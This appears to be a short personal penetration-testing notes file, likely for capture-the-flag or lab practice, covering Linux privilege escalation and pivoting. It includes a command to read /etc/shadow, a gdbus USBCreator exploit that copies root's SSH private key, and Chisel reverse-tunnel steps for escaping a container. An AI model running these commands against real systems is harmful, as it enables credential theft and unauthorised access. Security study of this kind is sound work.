shatternox/cyber-stuff/notes.md

 - see the inside > `cat etc/shadow`

 **Gdbuss Root SSH Privesc**
 1. gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/root_rsa true
 https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

+**Chisel**
+- If there's an attempt to SSH or something outside the docker container we are in and we cant access it.
+We need to socks proxy stuff it somehow.
+- If we are trapped inside a docker container.

+./chisel server --help
+./chisel client --help

+On our machine:
+1. `sudo ~/tools/chisel server -p [Anyport] --reverse`

+On the target Machine:
+2. Transfer the chisel client
+3. chmod +x chisel
+4. ./chisel client [Our IP]:[Our Port] R:[Localport usually 22]:[The IP we want to proxy]:[The Service port we want to proxy] R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>
+IF error, or stuff, just remove the local interface

 **LOGS**
 1. Always check /var/log/auth.log
 2. Always check /var/log/apache2/access.log

 **Wild card privesc**